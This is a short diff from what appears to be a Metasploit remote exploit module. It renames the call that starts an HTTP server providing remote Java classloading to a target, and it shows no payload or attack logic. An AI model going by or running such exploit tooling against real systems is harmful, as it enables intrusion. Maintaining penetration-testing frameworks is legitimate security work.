@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Start our HTTP server to provide remote classloading
-    @classloader_uri = start_service
+    @classloader_uri = java_class_loader_start_service
 
     unless @classloader_uri
       fail_with(Failure::BadConfig, 'Could not start remote classloader server')
